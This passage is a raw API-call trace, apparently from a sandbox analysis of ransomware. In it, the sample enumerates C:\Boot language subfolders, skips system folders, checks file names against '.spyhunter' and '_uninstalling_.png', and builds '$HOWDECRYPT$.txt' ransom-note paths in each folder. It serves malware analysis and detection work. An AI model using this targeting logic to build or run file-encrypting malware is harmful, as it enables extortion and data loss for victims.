GetProcessHeap () returned 0x2c0000 [0080.350] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x148) returned 0x30b778 [0080.350] GetProcessHeap () returned 0x2c0000 [0080.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0080.350] FindNextFileW (in: hFindFile=0x2d84e8, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0080.350] lstrcmpiW (lpString1="nl-NL", lpString2="Windows") returned -1 [0080.350] lstrlenW (lpString="Windows") returned 7 [0080.350] lstrcmpiW (lpString1="nl-NL", lpString2="$Recycle.bin") returned 1 [0080.350] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.350] lstrcmpiW (lpString1="nl-NL", lpString2="System Volume Information") returned -1 [0080.350] lstrlenW (lpString="System Volume Information") returned 25 [0080.350] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL") returned 17 [0080.350] lstrcmpW (lpString1="nl-NL", lpString2=".") returned 1 [0080.350] lstrcmpW (lpString1="nl-NL", lpString2="..") returned 1 [0080.350] GetProcessHeap () returned 0x2c0000 [0080.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0080.350] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\*") returned 19 [0080.350] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nl-NL\\*", lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0x30c378 [0080.351] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.351] lstrlenW (lpString="Windows") returned 7 [0080.351] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.351] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.351] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.351] lstrlenW (lpString="System Volume Information") returned 25 [0080.351] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\.") returned 19 [0080.351] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.351] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.351] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.351] lstrlenW (lpString="Windows") returned 7 [0080.351] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.351] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.351] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.351] lstrlenW (lpString="System Volume Information") returned 25 [0080.351] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\..") returned 20 [0080.351] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.351] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.351] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.351] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0080.351] lstrlenW (lpString="Windows") returned 7 [0080.351] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0080.351] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.351] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0080.351] lstrlenW (lpString="System Volume Information") returned 25 [0080.352] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned 33 [0080.352] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".spyhunter") returned 0x0 [0080.352] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.352] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0080.352] lstrlenW (lpString="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned 33 [0080.352] GetProcessHeap () returned 0x2c0000 [0080.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x84) returned 0x30d608 [0080.352] GetProcessHeap () returned 0x2c0000 [0080.352] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x150) returned 0x30b778 [0080.352] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0 [0080.352] FindClose (in: hFindFile=0x30c378 | out: hFindFile=0x30c378) returned 1 [0080.352] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\$HOWDECRYPT$.txt") returned 34 [0080.352] lstrlenW (lpString="\\\\?\\C:\\Boot\\nl-NL\\$HOWDECRYPT$.txt") returned 34 [0080.352] GetProcessHeap () returned 0x2c0000 [0080.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x86) returned 0x30d698 [0080.352] GetProcessHeap () returned 0x2c0000 [0080.352] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x158) returned 0x30b778 [0080.352] GetProcessHeap () returned 0x2c0000 [0080.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0080.352] FindNextFileW (in: hFindFile=0x2d84e8, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0080.352] lstrcmpiW (lpString1="pl-PL", lpString2="Windows") returned -1 [0080.352] lstrlenW (lpString="Windows") returned 7 [0080.352] lstrcmpiW (lpString1="pl-PL", lpString2="$Recycle.bin") returned 1 [0080.352] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.352] lstrcmpiW (lpString1="pl-PL", lpString2="System Volume Information") returned -1 [0080.352] lstrlenW (lpString="System Volume Information") returned 25 [0080.352] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL") returned 17 [0080.352] lstrcmpW (lpString1="pl-PL", lpString2=".") returned 1 [0080.352] lstrcmpW (lpString1="pl-PL", lpString2="..") returned 1 [0080.352] GetProcessHeap () returned 0x2c0000 [0080.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0080.352] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\*") returned 19 [0080.352] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pl-PL\\*", lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0x30c378 [0080.353] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.353] lstrlenW (lpString="Windows") returned 7 [0080.353] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.353] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.353] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.353] lstrlenW (lpString="System Volume Information") returned 25 [0080.353] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\.") returned 19 [0080.353] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.353] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.353] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.353] lstrlenW (lpString="Windows") returned 7 [0080.353] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.353] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.353] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.353] lstrlenW (lpString="System Volume Information") returned 25 [0080.353] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\..") returned 20 [0080.353] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.353] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.353] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.353] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0080.353] lstrlenW (lpString="Windows") returned 7 [0080.353] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0080.353] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.353] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0080.353] lstrlenW (lpString="System Volume Information") returned 25 [0080.354] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 33 [0080.354] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".spyhunter") returned 0x0 [0080.354] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.354] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0080.354] lstrlenW (lpString="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 33 [0080.354] GetProcessHeap () returned 0x2c0000 [0080.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x84) returned 0x30d728 [0080.354] GetProcessHeap () returned 0x2c0000 [0080.354] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x160) returned 0x30b778 [0080.354] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0 [0080.354] FindClose (in: hFindFile=0x30c378 | out: hFindFile=0x30c378) returned 1 [0080.354] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\$HOWDECRYPT$.txt") returned 34 [0080.354] lstrlenW (lpString="\\\\?\\C:\\Boot\\pl-PL\\$HOWDECRYPT$.txt") returned 34 [0080.354] GetProcessHeap () returned 0x2c0000 [0080.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x86) returned 0x30d7b8 [0080.354] GetProcessHeap () returned 0x2c0000 [0080.354] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x168) returned 0x30b778 [0080.354] GetProcessHeap () returned 0x2c0000 [0080.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0080.354] FindNextFileW (in: hFindFile=0x2d84e8, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0080.354] lstrcmpiW (lpString1="pt-BR", lpString2="Windows") returned -1 [0080.354] lstrlenW (lpString="Windows") returned 7 [0080.354] lstrcmpiW (lpString1="pt-BR", lpString2="$Recycle.bin") returned 1 [0080.354] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.354] lstrcmpiW (lpString1="pt-BR", lpString2="System Volume Information") returned -1 [0080.354] lstrlenW (lpString="System Volume Information") returned 25 [0080.354] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR") returned 17 [0080.354] lstrcmpW (lpString1="pt-BR", lpString2=".") returned 1 [0080.355] lstrcmpW (lpString1="pt-BR", lpString2="..") returned 1 [0080.355] GetProcessHeap () returned 0x2c0000 [0080.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0080.355] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\*") returned 19 [0080.355] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-BR\\*", lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0x30c378 [0080.356] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.356] lstrlenW (lpString="Windows") returned 7 [0080.356] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.356] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.356] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.356] lstrlenW (lpString="System Volume Information") returned 25 [0080.356] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\.") returned 19 [0080.356] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.356] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.356] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.356] lstrlenW (lpString="Windows") returned 7 [0080.356] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.356] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.356] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.356] lstrlenW (lpString="System Volume Information") returned 25 [0080.356] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\..") returned 20 [0080.356] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.356] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.356] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.356] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0080.356] lstrlenW (lpString="Windows") returned 7 [0080.356] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0080.356] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.356] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0080.356] lstrlenW (lpString="System Volume Information") returned 25 [0080.356] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 33 [0080.356] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".spyhunter") returned 0x0 [0080.356] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.356] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0080.356] lstrlenW (lpString="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 33 [0080.356] GetProcessHeap () returned 0x2c0000 [0080.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x84) returned 0x30d848 [0080.356] GetProcessHeap () returned 0x2c0000 [0080.356] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x170) returned 0x30b778 [0080.356] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0 [0080.356] FindClose (in: hFindFile=0x30c378 | out: hFindFile=0x30c378) returned 1 [0080.357] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\$HOWDECRYPT$.txt") returned 34 [0080.357] lstrlenW (lpString="\\\\?\\C:\\Boot\\pt-BR\\$HOWDECRYPT$.txt") returned 34 [0080.357] GetProcessHeap () returned 0x2c0000 [0080.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x86) returned 0x30d8d8 [0080.357] GetProcessHeap () returned 0x2c0000 [0080.357] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x178) returned 0x30b778 [0080.357] GetProcessHeap () returned 0x2c0000 [0080.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0080.357] FindNextFileW (in: hFindFile=0x2d84e8, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0080.357] lstrcmpiW (lpString1="pt-PT", lpString2="Windows") returned -1 [0080.357] lstrlenW (lpString="Windows") returned 7 [0080.357] lstrcmpiW (lpString1="pt-PT", lpString2="$Recycle.bin") returned 1 [0080.357] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.357] lstrcmpiW (lpString1="pt-PT", lpString2="System Volume Information") returned -1 [0080.357] lstrlenW (lpString="System Volume Information") returned 25 [0080.357] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT") returned 17 [0080.357] lstrcmpW (lpString1="pt-PT", lpString2=".") returned 1 [0080.357] lstrcmpW (lpString1="pt-PT", lpString2="..") returned 1 [0080.357] GetProcessHeap () returned 0x2c0000 [0080.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0080.357] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\*") returned 19 [0080.357] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-PT\\*", lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0x30c378 [0080.357] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.357] lstrlenW (lpString="Windows") returned 7 [0080.357] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.357] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.357] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.357] lstrlenW (lpString="System Volume Information") returned 25 [0080.357] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\.") returned 19 [0080.357] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.358] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.358] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.358] lstrlenW (lpString="Windows") returned 7 [0080.358] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.358] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.358] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.358] lstrlenW (lpString="System Volume Information") returned 25 [0080.358] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\..") returned 20 [0080.358] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.358] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.358] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.358] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0080.358] lstrlenW (lpString="Windows") returned 7 [0080.358] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0080.358] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.358] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0080.358] lstrlenW (lpString="System Volume Information") returned 25 [0080.358] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned 33 [0080.358] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".spyhunter") returned 0x0 [0080.358] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.358] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0080.358] lstrlenW (lpString="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned 33 [0080.358] GetProcessHeap () returned 0x2c0000 [0080.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x84) returned 0x30d968 [0080.358] GetProcessHeap () returned 0x2c0000 [0080.358] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x180) returned 0x30b778 [0080.358] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0 [0080.358] FindClose (in: hFindFile=0x30c378 | out: hFindFile=0x30c378) returned 1 [0080.358] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\$HOWDECRYPT$.txt") returned 34 [0080.358] lstrlenW (lpString="\\\\?\\C:\\Boot\\pt-PT\\$HOWDECRYPT$.txt") returned 34 [0080.358] GetProcessHeap () returned 0x2c0000 [0080.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x86) returned 0x30d9f8 [0080.358] GetProcessHeap () returned 0x2c0000 [0080.358] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x188) returned 0x30b778 [0080.358] GetProcessHeap () returned 0x2c0000 [0080.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0080.359] FindNextFileW (in: hFindFile=0x2d84e8, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0080.359] lstrcmpiW (lpString1="ru-RU", lpString2="Windows") returned -1 [0080.359] lstrlenW (lpString="Windows") returned 7 [0080.359] lstrcmpiW (lpString1="ru-RU", lpString2="$Recycle.bin") returned 1 [0080.359] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.359] lstrcmpiW (lpString1="ru-RU", lpString2="System Volume Information") returned -1 [0080.359] lstrlenW (lpString="System Volume Information") returned 25 [0080.359] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU") returned 17 [0080.359] lstrcmpW (lpString1="ru-RU", lpString2=".") returned 1 [0080.359] lstrcmpW (lpString1="ru-RU", lpString2="..") returned 1 [0080.359] GetProcessHeap () returned 0x2c0000 [0080.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0080.359] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\*") returned 19 [0080.359] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ru-RU\\*", lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0x30c378 [0080.360] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.360] lstrlenW (lpString="Windows") returned 7 [0080.360] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.360] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.360] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.360] lstrlenW (lpString="System Volume Information") returned 25 [0080.360] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\.") returned 19 [0080.360] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.360] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.360] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.360] lstrlenW (lpString="Windows") returned 7 [0080.360] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.360] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.360] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.360] lstrlenW (lpString="System Volume Information") returned 25 [0080.360] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\..") returned 20 [0080.360] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.360] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.360] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.360] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0080.360] lstrlenW (lpString="Windows") returned 7 [0080.360] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0080.360] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.360] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0080.360] lstrlenW (lpString="System Volume Information") returned 25 [0080.360] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned 33 [0080.360] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".spyhunter") returned 0x0 [0080.360] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.360] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0080.361] lstrlenW (lpString="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned 33 [0080.361] GetProcessHeap () returned 0x2c0000 [0080.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x84) returned 0x30da88 [0080.361] GetProcessHeap () returned 0x2c0000 [0080.361] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x190) returned 0x30b778 [0080.361] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0 [0080.361] FindClose (in: hFindFile=0x30c378 | out: hFindFile=0x30c378) returned 1 [0080.361] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\$HOWDECRYPT$.txt") returned 34 [0080.361] lstrlenW (lpString="\\\\?\\C:\\Boot\\ru-RU\\$HOWDECRYPT$.txt") returned 34 [0080.361] GetProcessHeap () returned 0x2c0000 [0080.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x86) returned 0x30db18 [0080.361] GetProcessHeap () returned 0x2c0000 [0080.361] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x198) returned 0x30b778 [0080.361] GetProcessHeap () returned 0x2c0000 [0080.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0080.361] FindNextFileW (in: hFindFile=0x2d84e8, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0080.361] lstrcmpiW (lpString1="sv-SE", lpString2="Windows") returned -1 [0080.361] lstrlenW (lpString="Windows") returned 7 [0080.361] lstrcmpiW (lpString1="sv-SE", lpString2="$Recycle.bin") returned 1 [0080.361] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.361] lstrcmpiW (lpString1="sv-SE", lpString2="System Volume Information") returned -1 [0080.361] lstrlenW (lpString="System Volume Information") returned 25 [0080.361] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE") returned 17 [0080.361] lstrcmpW (lpString1="sv-SE", lpString2=".") returned 1 [0080.361] lstrcmpW (lpString1="sv-SE", lpString2="..") returned 1 [0080.361] GetProcessHeap () returned 0x2c0000 [0080.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0080.361] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\*") returned 19 [0080.361] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\sv-SE\\*", lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0x30c378 [0080.362] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.362] lstrlenW (lpString="Windows") returned 7 [0080.362] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.362] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.362] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.362] lstrlenW (lpString="System Volume Information") returned 25 [0080.362] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\.") returned 19 